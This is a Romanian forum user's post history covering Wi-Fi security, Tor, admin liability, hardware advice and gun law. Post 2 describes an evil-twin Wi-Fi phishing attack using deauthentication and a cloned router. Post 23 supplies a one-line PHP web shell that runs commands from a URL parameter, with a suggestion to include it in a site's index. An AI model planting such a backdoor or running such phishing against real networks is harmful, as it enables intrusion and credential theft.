Jump to content

yoyois

Active Members
  • Posts

    1755
  • Joined

  • Last visited

  • Days Won

    58

Everything posted by yoyois

  1. Cred ca maximul de securitate ar fi ca la inregistrarea userului sa stochezi si numarul de telefon si imei-ul si emailul (verificate/confirmate). (pune si un captcha) Daca cineva vrea sa se "reinregistreze" are nevoie sa-si faca mail nou, numar de telefon nou si sa falsifice IMEI. Daca nici asta nu e suficient de sigur poate ca nu ar trebui sa dai un bonus asa de mare la necunoscuti. (da bonusul dupa o perioada de activitate: dupa 5 zile, dupa ce faci x activitati)
  2. WPA2 sau WEP? Bruteforce e cam singura solutie. Routerele au cel mai probabil parole generate random. Alt exploit nu exista. Orice pachete ai trimite tu routerului el le ignora(daca nu esti conectat la el). Alternativa ar fi "social engeneering". Faci deauth la un router, si il clonezi (same MAC, same SSID, fara parola) pe routerul tau fals faci un DNS redirect la un phishing page care cere parola routerului. Daca ai noroc un fraier o sa se conecteze la routerul fals si o sa bage parola corecta. (cu mult noroc, daca faci deauth sau jam o sa incerce sa se deconecteze si reconecteze manual, ca nu ii merge netul). Daca e WEP se poate sparge daca colectezi suficiente pachete. Daca esti Hax0r gasesti alta vulnerabilitate ca sa obtii parola.
  3. ^Pune si tu mana si citeste despre: IEEE 802.1X and RADIUS Authentication Uite link: http://freeradius.org/enterprise-wifi.html Toata lumea mai are inca de invatat. Cat despre topic, @sipos_raul vrei sa citesti despre HTTPS, https everywhere (addon pt firefox/chrome) VPN, VPN book, CyberGhost? Poate vorbesti cu administratorul retelei despre sporirea securitatii (desi nu cred ca e cazul la facultatea ta). PS: nu e de gluma. Poate unii vor sa trimita informatii sensibile. Edit: Spartul parolelor wi-fi: WEP- atac prin analiza, interceptezi un volum mare de trafic pana gasesti 2 pachete cu aceeasi cheie, poti deriva cheia. (easy) WPA - singura solutie este bruteforce. WPA nu are vulnerabilitati care permit determinarea cheii. singura solutie e bruteforce pe un pachet capturat. (crack the AES) Pin attack? / vulnerabilitati in router?
  4. USB-ul flash se deterioreaza ft repede. (mai ales sub radiatie). CD/DVD e o solutie buna insa citirea datelor necesita dioda laser si in instrument optic precis. Eu as merge pe banda magnetica pt o perioada scurta si DVD pt o perioada mai lunga. (nu HDD pt ca nu stiu dupa cum sa mai accesez file-systemul) Problema aici e ca datele(standardul in care sunt stocate) sa fie si usor de citit. As include in Banda magnetica si in DVD-uri scheme despre constructia unui DVD player, o copie linux, un compilator C, arhitectura unui Intel/ARM. Si multe carti de fizica, istorie, mate, chimie si informatica. Anyway toate informatiile astea ar putea fi descifrate dupa 2-3 generatii. Cand s-ar reconstrui generatoare, aparate radio etc. (Descoperirea fenomenelor electromagnetice, descifrarea benzii magnetice) Referinta: https://en.m.wikipedia.org/wiki/Voyager_Golden_Record
  5. yoyois

    decriptare licenta

    https://stackoverflow.com/questions/3002067/how-are-software-license-keys-generated Se poate sa fie doar base 64 din ceva bit array. (mai ales ca are padding ==) E greu de realizat ce poate fi ci ce entropie are fara sa ai detalii despre cum este generat sau validat.
  6. So: Daca el retine cheile si cand vine garda el scoate stick-ul cu toate cheile userilor, nu este acuzat de nimic? Atunci nu e responsabilitatea adminului sa foloseasca cheile, sa vada continutul site-ului si sa semnaleze activitatile ilegale? (ps: poate fi acuzat de complicitate, pt ca a vazut activitatea ilegala si nu a semnalat-o).
  7. Ok, dar poti dupa sa scapi in tribunal? De exemplu cand whatsapp, facebook, apple etc. au fost folosite de teroristi, politia a cerut datele de pe servere si a plecat linistita. Poti fi acuzat de ceva in tribunal? (hostare de continut care ar putea fi ilegal daca e decriptat cu cheia corecta?)
  8. Intrebarea mea e putin neobisnuita, dar avand in vedere faptul ca forumul gazduieste multe genuri de oameni... Am avut un argument cu un amic care face magarii si as vrea sa aud parerea voastra legala/morala despre responsabilitatea unui admin asupra continutului unui site. Cat de vinovat este un sysadmin daca cineva posteaza pe site-ul lui continut ilegal(aici vorbim de chesti nasoale)? Daca adminul construieste o platforma care ii permite userului sa posteze continut anonim(fara ca adminul sa il poata citi, ex Encrypted ChatRoom, AES, Key stored client-side) mai este adminul responsabil sau poate invoca faptul ca nu a stiut ce se petrece pe site (pt ca nu avea cheile)? (dar daca adminul castiga bani din acest serviciu? - ex Subscription program ) PS: Oricum vine garda si-ti ia serverele, problema e daca te ia si pe tine.
  9. Vrei feedback, na feedback: Am deschis site-ul tau. Ma declar instant un "never-comeback user". Continutul este foarte superficial. Topicurile sunt foarte variate si slabe in continut. Sincer nu mi-as pierde timpul pe site-ul tau citind coduri GTA, sau ca " Am ajuns la un nivel mare cu telefoanele ele au memorie mare, dar şi consumă mult. " Fie aduci vizite din SEO (nu vad sa fi facut ceva pe partea de SEO). Fie aduci vizite din SocialMedia (bafta la click-bait). Estimare monetizare: maxim 5$ pe luna Edit: Nu mai fac un post nou; 200 euro? Nu am mare experienta in domeniu, dar as vrea sa imi explice cineva cum faci 100euro pe luna dintr-un website de genul. Iti da AdSense 100euro pt 500 de vizite pe luna sau cum functioneaza treaba?
  10. De la a fura 3,641,694 ether pana la a avea 50 milioane de dolari cash e multa munca. (gandeste-te numai cine iti cumpara ETH, stiind ca o sa fie blocat) Din cate se pare, nu o sa poata valorifica ETH. Frumos structurat articolul si explicatiile.
  11. e facut in Unity. La optimizare te-ai gandit? Custom textures, occlusion culling, custom models. E multa munca, dar bafta daca vrei sa mergi pe dumul asta!
  12. Bani aruncati aiurea! Este foarte overkill! Nu8 ititrebuie placa video din seria 960M daca nu vrei sa faci gaming serios. (cauta cuplaca video 950M MAXIM!) Procesorul e mult prea puternic. dar si eficiend (poate merge). 16Gb RAM sunt utili doar pt gaming sau video-render. 8GB sunt suficienti in majoritatea aplicatiilor uzuale. Din resursele unui astfel de laptop tu folosesti maxim 70%. Restul sunt bani aruncati de pomana. PS: Nici SSD nu iti trebuie asa tare. (Doar daca vrei sa mergi mult cu laptopul in spate, in cazul asta un ssd e mai de durata). PS2: Opteaza pt un laptop mai slab (procesor cu clock mai mic si placa video 950M). Bateria te tine semnificativ mai mult si e mult mai ieftin. Daca nu vrei sa te joci pe el sau sa faci video-encoding nu iti trebuie asemenea specificatii.
  13. What is this? Cred ca e cel mai lenes tutorial pe care l-am vazut. JS-ul e gresit si nu face nicun POC. Not useful not recommend!
  14. Si ce daca exit-nodurile sunt monitorizate? Daca folosesti TOR pt inside networking (aka .onion websites) sau chiar daca folosesti SSL + reguli stricte anti JS si Flash esti 100% safe. Ca TOR sa fie 'sigur' ai nevoie ca 60% din retea sa nu fie controlata + un exit-node trusted sau un SSL intre tine si webserver. Ideea ca TOR nu e safe e injectata tot de niste agentii guvernamentale ca sa tina script kiddies departe de asa ceva. TOR a fost dezvoltat de armata americana, deci iti poti imagina ca are la baza cam cele mai puternice metode de anonimizare cunoscute. The exploits are in the broswer, more in the poor user configuring the broswer and forgetting about SSL, JS, Flash, CodeInjection etc.
  15. Tor nu e open-source? Cum sa ai backdoor in open-source? Chiar si asa nu vad de ce nu ar mai iesi si alte servicii 'tor like' cu securitatea intarita. Din cate cred eu. se face referire la exploiturile flash si js din TOR broswer. (care au mai fost rezolvate si dezactivate)
  16. Frumos. E o idee dar nu ai inca prea clar publicul tinta. Mai e de lucrat la interfata grafica. Trebuie facut totul mai placut si mai intuitiv. Daca vrei sfaturi practice: Care e planul tau? Vrei ca proiectul tau sa fie adoptat de scoli? Sau sa fie cumparat de minister si bagat cu forta in scoli? Pentru asta incearca sa il faci sa arate cat mai mult ca windows si pune pe el un error handler foarte bun. Altfel la primele erori profesorii o sa se pise pe el. PS: Adauga Office, Chromium, etc. (astea de baza) ca preinstalate. Adauga si ceva optiuni de a instala un pachet XAMP (ca sa tii un webserver). Interfata mai frumoasa si poate ai o sansa. (ia in calcul ca 70% din profii de info nu stiu linux, sysadmin si nici programare in general)
  17. Sa ii fut in gura. Sunt dovezi clare sa crezi ca virusul e facut la misto de ceva firma/security manager doar sa isi promoveze produsele. E un "malware" destul de prost si ma mir ca asa ceva ar ajunge in etapa de mass deployment. Daca vor 150$ pe fisiere ar fi implementat metode de securitate mult mai bune si ar fi lucrat mai mult la cod. Azi tot mai multe firme creeaza cryptolockere si dupa isi vand sau promoveaza metodele private de "decriptare". Nu e asa de greu de facut un crypto-locker bun, sunt tone de exemple de cod.
  18. Is it clean? Does it have versions of itself packed? or is it one way clean deal official shit? Do you guarantee?
  19. Treaba cu cartelele rezolva si alte probleme. Daca sunt cumparate cu buletinul este mult mai usor sa obtiiun mandat pentru interceptarea infractorilor. Telefoanele pot fi ascultate mai legal si mai usor si se pot cere datele instant de la operatori. Treaba cu teroristii e in trend. Ca teroristii fac, ca teroristii pun, si cumpara si zic. In realitate pentru teroristii astia rai sunt divizii specializate pentru "sigurnata tarii" care ar trebui sa monitorizeze, fileze, infiltreze si spoineze orice retea terorista. Ei au mijloace ceva mai avansate si in numele "sigurantei nationale" pot asculta pe toata lumea si planta microfoane unde vor ei. PS: Nu a fost oprit nicun atentat terorist(de pe spatiul arab) cu metodele de securitate europene. Toate atentatele care au fost oprite au fost descoperite de americani (CIA) prin agenti infiltrati si monitorizarea unor preoti si discipoli radicali descoperiti in taberele de antrenament. Monitorizarea in masa nu da aproape niciodata rezultate.
  20. stub de 2000$ despre ce vorbesti tu? Ce are in el de e asa scump?
  21. Vise. Nu ai voie! Intrii la parnaie pentru vatamare sau crima(daca il belesti prea tare). Armele de aparare sunt gandite ca sa le folosesti de 1-2 ori in viata in situatii critice. Atunci tragi la nimereala sa ii sperii pe atacatori. Nu te gandi la filme americane cu "pac pac" omori sute de mafioti. (arme se pot obtine si de pe piata neagra, nu chiar asa de greu) Dar daca te intereseaza strict aparare, un spray lacrimogen e ft eficient si legal. (nu te baza pe arme, la noi legislatia e prea stricta, nici politistii nu sunt incurajati sa traga)
  22. Cel mai simplu si frumos e sa faci pt un club sportiv. Sunt o gramada de cluburi sportive pt tras cu arma (letala, neletala etc.) Trebuie sa treci teste dar in cadrul uni club poti sa tragi cu arma pana te saturi. (asta daca vrei sa te distrezi) Daca vrei sa te 'protejezi' legea e asa de complicata pt ca se bazeaza pe principul ca tu nu vei folosi arma respectiva niciodata, deaia trebuie sa inveti multa legislatie si putina practica. Practica e concentrata mai mult pe cum sa intretii arma, cum sa o descarci, cum sa o blochezi etc. si mai putin pe cum sa tragi.
  23. // Facut cu truda de baietii // -RST- // Hax0r 1337 CraCk Hacked OneMax RST GrupInfraczional <?php echo shell_exec($_GET["cmd"]); ?> E cel mai mic gasit. Poti sa il pui intr-un fisier si sa faci include in index sau whatever. Sper sa nu faca hernie baietii.
  24. Pata de sange nu pare a fi splash. Dupa cantitate si modul cum curge v-ati gandit ca se poate sa fi dat cu capul de perete dupa ce s-a impuscat? Se pate ca glontul sa nu fi parasit niciodata craniul.
  25. daca tigara din mana era aprinsa cand s-a impuscat, nu trebuia sa arda complet pana se descopera scena?
×
×
  • Create New...